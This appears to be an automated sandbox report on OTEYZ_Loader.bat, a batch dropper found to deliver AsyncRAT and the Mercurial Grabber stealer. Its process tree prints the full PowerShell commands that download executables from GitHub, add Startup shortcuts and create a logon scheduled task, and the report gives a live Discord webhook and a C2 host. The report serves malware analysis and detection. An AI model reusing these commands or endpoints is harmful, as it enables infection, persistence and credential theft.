Overview

overview

10

Static

static

1

OTEYZ_Loader.bat

windows7-x64

8

OTEYZ_Loader.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 12:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OTEYZ_Loader.bat

  • Size

    1KB

  • MD5

    f3f83ae17a3f81e0265b9ce7e480bd4e

  • SHA1

    994d8d5b533fd09630b45a0d0404f65557e83d5d

  • SHA256

    412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

  • SHA512

    cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Score
10/10
asyncratmercurialgrabberdefaultevasionexecutionratspywarestealer

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

    stealermercurialgrabber
  • Mercurialgrabber family
    mercurialgrabber
  • Async RAT payload 1 IoCs
    rat
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OTEYZ_Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1896
    • C:\Users\Admin\Desktop\output.exe
      C:\Users\Admin\Desktop\output.exe
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Maps connected drives based on registry
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      PID:1152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5072
    • C:\Users\Admin\Desktop\Loader.exe
      C:\Users\Admin\Desktop\Loader.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5012
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2252
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDC56.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:4352
        • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
          "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4264
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "WINDOWS"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4788
            • C:\Windows\system32\schtasks.exe
              schtasks /delete /f /tn "WINDOWS"
              6⤵
                PID:4408
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD099.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4316
              • C:\Windows\system32\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:3064

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      ba7bb8c22d72f7d6094bf4b7a11fd2df

      SHA1

      e68eab39081c17997a16bca1667f1544f11804a5

      SHA256

      0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a

      SHA512

      58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4287f98e69f683003dd6ec75a62a3451

      SHA1

      13f31fa915286c0eb8602dc9a4eafe908d7ef4c5

      SHA256

      cb119e9e46d913d658ec71f08c980d5a3cfe72077d7ddd627974beaead6e5a04

      SHA512

      0c6953759f2b03eeace6c963745e408433ec40953fbe75d29c1010f57bb00bd42008f01dc23be134e995a27ffc5f50206c15551c0223912fb1df51b32b22d647

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      521bc2fa85c211337fec9071a9f838b5

      SHA1

      acbf36fa3c911e074cedd58d3646901e2e5f6eb0

      SHA256

      cefa6417fe932e68daf11f0c76c24a4872252ca0d577a12405655e695583a27c

      SHA512

      bbba37291cc1ce0e2b02c5c7e730b2546c11b3be5d4c84952b2877de82d206afdce61e0e8b642a77a68a56f13b50375f2fce3968f7504dd0edc51fbe75161035

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oeodqlpr.lu5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpD099.tmp.bat
      Filesize

      156B

      MD5

      084a8eaa21c0b955287a74fe0b0ebeb3

      SHA1

      449926d90d776679fe2ba408dfbb0b2227fac7fb

      SHA256

      1ac4038f89409feb030fb977352c3876412ed0be56b932672221fa20814f7bfe

      SHA512

      2288f26536df674e8badd1617e75a2fd88ede9b9b1b1288c8d6d1a473ceafda1e867d50c073118d4721891379532970f87a8e85b2212087c1e7ad193b8e387f3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpDC56.tmp.bat
      Filesize

      151B

      MD5

      b9c3c86a16607f5b7059852131dbb39e

      SHA1

      a84e1b23a20a171bbacd02b4283b3586878d4ee0

      SHA256

      0b5625c905d0141d253b1f33d60cac0b1ba2feb4a0a5ffd4f78dc7828e0cfeb0

      SHA512

      a75664587eb21c7b4631225f028c4610e07f6c91c2e3bc5c28373638febdb513238b43df54cbc9fd82de2e31d17faebde927be9799ca58c45bee0f20e881c1ca

      Download Submit

    • C:\Users\Admin\Desktop\Loader.exe
      Filesize

      63KB

      MD5

      7ceb11ebb7a55e33a82bc3b66f554e79

      SHA1

      8dfd574ad06ded662d92d81b72f14c1914ac45b5

      SHA256

      aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

      SHA512

      d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

      Download Submit

    • C:\Users\Admin\Desktop\output.exe
      Filesize

      41KB

      MD5

      a0e598ec98a975405420be1aadaa3c2a

      SHA1

      d861788839cfb78b5203686334c1104165ea0937

      SHA256

      e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

      SHA512

      e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

      Download Submit

    • memory/1152-46-0x00000000008E0000-0x00000000008F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1896-28-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1896-30-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1896-34-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1896-18-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2464-11-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2464-12-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2464-16-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2464-0-0x00007FFB5BBD3000-0x00007FFB5BBD5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2464-10-0x00000168B6860000-0x00000168B6882000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4264-77-0x000000001D540000-0x000000001D5B6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4264-78-0x0000000002F80000-0x0000000002FB4000-memory.dmp

      Filesize

      208KB

      Download

    • memory/4264-79-0x0000000002FF0000-0x000000000300E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4264-80-0x000000001D440000-0x000000001D4F2000-memory.dmp

      Filesize

      712KB

      Download

    • memory/5012-63-0x0000000000BB0000-0x0000000000BC6000-memory.dmp

      Filesize

      88KB

      Download